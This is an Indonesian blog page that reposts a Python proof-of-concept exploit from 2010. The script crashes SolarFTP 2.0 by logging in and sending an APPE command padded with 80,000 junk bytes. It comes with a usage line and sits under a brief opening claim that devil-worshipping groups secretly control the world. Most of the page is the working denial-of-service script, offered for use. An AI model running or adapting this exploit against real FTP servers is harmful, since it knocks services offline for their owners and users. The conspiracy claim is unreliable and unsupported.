Asalamualaikum ,  Selamat Datang  |  Its Not Diary  |  News And Opini  |  Thanks ?

Begitu banyak hal yang tertutupi dari negara kita sendiri bahkan dari konsep seluruh negara dan percayalah ada segelintir orang bahkan beberapa kelompok pemuja iblis yang mengatur konsep yang ada dan kita jalani saat ini.

SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability



#!/usr/bin/python

# Exploit Title: SolarFTP 2.0 Multiple Commands Denial of Service Vulnerability
# Date: 12/17/2010
# Author: modpr0be
# Software Link: http://www.solarftp.com/files/solarftps-setup.exe
# Vulnerable version: 2.0
# Tested on: Windows XP SP2, Windows XP SP3
# CVE : N/A
#
# ======================================================================
# ___ _ __ __ __ _ __
# ____/ (_)___ _(_) /_____ _/ / ___ _____/ /_ (_)___/ /___ ____ _
# / __ / / __ `/ / __/ __ `/ / / _ \/ ___/ __ \/ / __ / __ \/ __ `/
# / /_/ / / /_/ / / /_/ /_/ / / / __/ /__/ / / / / /_/ / / / / /_/ /
# \__,_/_/\__, /_/\__/\__,_/_/ \___/\___/_/ /_/_/\__,_/_/ /_/\__,_/
# /____/ http://www.digital-echidna.org
# ======================================================================
#
# Greetz:
# say hello to all digital-echidna org crew:
# otoy, bean, s3o, d00m, n0rf0x, fm, gotechidna, manix
# special thx to amalia (^^), oebaj, offsec, exploit-db, corelan team
#
#### Software description:
# Solar FTP Server is a handy and easy to use personal FTP server with
# features like virtual directories, simple and intuitive user interface,
# real-time activity monitoring and management.
#
#### Exploit information:
# SolarFTP 2.0 will suddenly stop (crash) while these commands were sent:
# APPE, GET, PUT, NLST, and MDTM
# Sending USER with junk also crashing the Admin Configuration but not the service.
# Stack contains our junk in random. Both EIP and SEH were not overwritten.
#
#### Other information:
# 12/10/2010 - vendor contacted
# 12/17/2010 - no response, advisory released

import socket, sys
s=socket.socket(socket.AF_INET, socket.SOCK_STREAM)

junk = "\x41" * 80000

def banner():
print "\nSolarFTP 2.0 Multiple Commands Denial of Service Vulnerability."
print "By: modpr0be (modpr0be[at]digital-echidna[dot]org)\n"


if len(sys.argv)!=4:
banner()
print "Usage: %s <ip> <user> <pass>\n" %sys.argv[0]
sys.exit(0)

try:
s.connect((sys.argv[1], 21))
except:
print "Can\'t connect to server!\n"
sys.exit(0)

s.recv(1024)
s.send('USER '+sys.argv[2]+'\r\n')
s.recv(1024)
s.send('PASS '+sys.argv[3]+'\r\n')
s.recv(1024)
s.send('APPE '+junk+'\r\n')
s.recv(1024)
s.close()
Label:

0 komentar:

Posting Komentar

Terima kasih Telah Berkunjung

Langganan: Posting Komentar (Atom)